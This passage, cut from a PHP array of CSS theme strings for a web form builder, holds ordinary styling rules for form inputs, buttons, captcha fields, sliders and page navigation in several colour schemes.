!important;\n}\n.input_deactive\n{\ncolor:#CFC1C1 !important;\nbackground-color:#E96711 !important;\nfont-style:italic !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#ffffff !important;\nheight:18px !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.captcha_input:focus\n{\ncolor:#000000 !important;\nheight:18px !important;\nbackground-color:#FFDDC4 !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}   \n.page_deactive\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_active\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#E96711 !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_percentage_active \n{\npadding: 0px !important;\nmargin: 0px !important;\nborder-spacing: 0px !important;\nheight: 10px !important;\nline-height: 10px !important;\nbackground-color: #AB0101 !important;\nborder-radius: 0px !important;\nfont-size: 15px !important;\nfloat: left !important;\ntext-align: right !important;\n}\n.page_percentage_deactive {\nheight: 10px !important;\nline-height: 9px !important;\nborder: 1px solid #FF8F00 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\ntext-align: left !important;\npadding: 2px !important;\nborder-radius: 0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\n.other_input\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nmargin-left: 25px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.other_input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\nspan.wdform_page_button\n{\ncolor:#000000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom: 5px !important;\nbackground-color:#AB0101 !important;\nline-height: 35px !important;\n}\n.wdform_percentage_text\n{\n	font-family:''Times New Roman'', Times, serif !important;\nmargin:0px -30px 0px 0px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\nfont-size: 13px !important;\n}\n.wdform_percentage_title\n{\n	font-family:''Times New Roman'', Times, serif !important;\ncolor:#000000 !important;\nfont-style:italic !important;\nline-height:9px !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #E96711 !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#FFFFFF;\r\nbackground-color:#E96711;\r\nborder:1px solid #FF8F00;\r\n}\r\n\r\n.wdform_grading input:focus\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFDDC4;\r\nborder:1px solid #F19200;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#E96711 !important;\r\nborder:1px solid #FF8F00;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#E96711 ;\r\nborder:1px solid #FF8F00;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FF8F00;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#E96711 ;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#E96711 ;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FF8F00;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FF8F00;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\nbackground:#E96711;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\nborder:1px solid #FF8F00;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\nbackground:#FFDDC4;\r\ncolor:#000;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #FF8F00;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n}\r\n\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#FFFFFF;\r\nbackground-color:#E96711;\r\nborder:1px solid #FF8F00;\r\nmargin:5px 7px;\r\npadding:1px;\r\n}\r\n\r\n.wdform_matrix table input:focus, .wdform_matrix table select:focus\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFDDC4;\r\nborder:1px solid #F19200;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "16" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th, .wdform_table2 td{\n	vertical-align:top !important;\n	text-align:left;\n}\n.wdform_table2,  .wdform_table2 table{\nwidth:inherit !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#000000 !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_date_fields select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_date_fields select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_date_fields input\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date_fields input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_select select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_select select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_address input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address input\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input \n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.wdform_address select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:22px !important;\n}\n.time_box\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.time_box:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.am_pm_select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #FF8F00 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#CFC1C1 !important;\nbackground-color:#E96711 !important;\nfont-style:italic !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#ffffff !important;\nheight:18px !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.captcha_input:focus\n{\ncolor:#000000 !important;\nheight:18px !important;\nbackground-color:#FFDDC4 !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}   \n.page_deactive\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_active\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#E96711 !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_percentage_active \n{\npadding: 0px !important;\nmargin: 0px !important;\nborder-spacing: 0px !important;\nheight: 10px !important;\nline-height: 10px !important;\nbackground-color: #000000 !important;\nborder-radius: 0px !important;\nfont-size: 15px !important;\nfloat: left !important;\ntext-align: right !important;\n}\n.page_percentage_deactive {\nheight: 10px !important;\nline-height: 9px !important;\nborder: 1px solid #FF8F00 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\ntext-align: left !important;\npadding: 2px !important;\nborder-radius: 0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\n.other_input\n{\ncolor:#ffffff !important;\nbackground-color:#E96711 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nmargin-left: 25px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.other_input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #FF8F00 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000000 !important;\nbackground-image:url([SITE_ROOT]/images/button2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #A02900 !important;\n}\nspan.wdform_page_button\n{\ncolor:#fff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom: 5px !important;\nbackground-color:#000000 !important;\nline-height: 35px !important;\n}\n.wdform_percentage_text\n{\nmargin:0px -30px 0px 0px !important;\ncolor:#000000 !important;\nfont-weight:bold !important;\nfont-size: 13px !important;\n}\n.wdform_percentage_title\n{\ncolor:#000000 !important;\nfont-style:italic !important;\nline-height:9px !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #E96711 !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #000000;\r\npadding:0 4px;\r\n}\r\n\r\n.wdform_grading input:focus\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFDDC4;\r\nborder:1px solid #734C00;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder:1px solid #000000;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder:1px solid #000000;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#F06E00;\r\n\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #000000;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #000000;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nmargin:5px 7px;\r\nborder:1px solid #000000;\r\npadding:1px;\r\n}\r\n\r\n.wdform_matrix table input:focus, .wdform_matrix table select:focus\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFDDC4;\r\nborder:1px solid #734C00;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "17" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th, .wdform_table2 td{\n	vertical-align:top !important;\n	text-align:left;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table2,  .wdform_table2 table{\nwidth:inherit !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#56AEEE !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_date_fields select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date_fields input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_select select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_select select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input \n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px 